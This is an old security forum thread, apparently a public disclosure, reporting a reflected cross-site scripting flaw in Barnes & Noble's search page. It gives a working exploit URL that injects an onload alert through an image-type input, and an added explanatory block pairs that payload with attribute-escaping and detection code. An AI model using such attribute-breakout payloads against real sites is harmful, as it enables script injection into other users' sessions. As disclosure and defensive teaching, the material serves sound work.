Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
XSS : Barnes & Noble
Posted by: godberIT
Date: October 22, 2007 10:31AM

Nothing persistent, but a complete ignorance from b&n admins...
Uses an <input type="Image" /> override to avoid tags.

http://www.barnesandnoble.com/booksearch/noresults.asp?SAT=1&SZE=10&TTL=%22%20TYPE=%22IMAGE%22%20src=%22http://images.barnesandnoble.com/presources/images/tab_bookclubs_roll.gif%22%20onload=%22alert('XSS')&Z=y&ERN=210

long desc: http://www.godberit.de/blog/2007/10/22/xss-bn/



Edited 1 time(s). Last edit at 10/22/2007 10:32AM by godberIT.

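As an added example (not code from the thread or from barnesandnoble.com), the attribute-context escaping that closes this class of bug: the search term is reflected inside a double-quoted `value` attribute, so an unescaped quote ends the attribute and the rest of the term becomes new attributes on the same tag. The search term below is constructed to match the shape of the one in the URL above; the image URL and the function names are hypothetical.

```javascript
// Escapes the characters that matter inside a double-quoted HTML attribute.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Vulnerable rendering: the term is concatenated straight into the attribute,
// which is the pattern the report above describes (no new tag is needed).
function renderVulnerable(term) {
  return `<input name="TTL" value="${term}" />`;
}

// Hardened rendering: the term is escaped for the attribute context first,
// so the injected quote stays inside the value instead of closing it.
function renderHardened(term) {
  return `<input name="TTL" value="${escapeAttr(term)}" />`;
}

// Defensive check for tests or template review: count attributes that open a
// double-quoted value. The template writes exactly two (name and value); any
// extra ones were introduced by the reflected data.
function countAttributes(html) {
  const m = html.match(/\b[\w-]+="/g);
  return m ? m.length : 0;
}

// Constructed search term shaped like the thread's TTL parameter after URL decoding:
// a quote closes value=, then type/src/onload are appended. Hypothetical image URL.
const term = '" TYPE="IMAGE" src="http://example.invalid/x.gif" onload="alert(\'XSS\')';

// Example usage: the vulnerable tag gains three attributes, the hardened one does not.
console.log(renderVulnerable(term), countAttributes(renderVulnerable(term)));  // 5
console.log(renderHardened(term), countAttributes(renderHardened(term)));      // 2
```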
Re: XSS : Barnes & Noble
Posted by: Spyware
Date: October 22, 2007 11:06AM

Cool and all, but why don't you post this in the "So it begins" thread?

Re: XSS : Barnes & Noble
Posted by: hackathology
Date: November 04, 2007 09:19AM

cool and smart one.

http://hackathology.blogspot.com
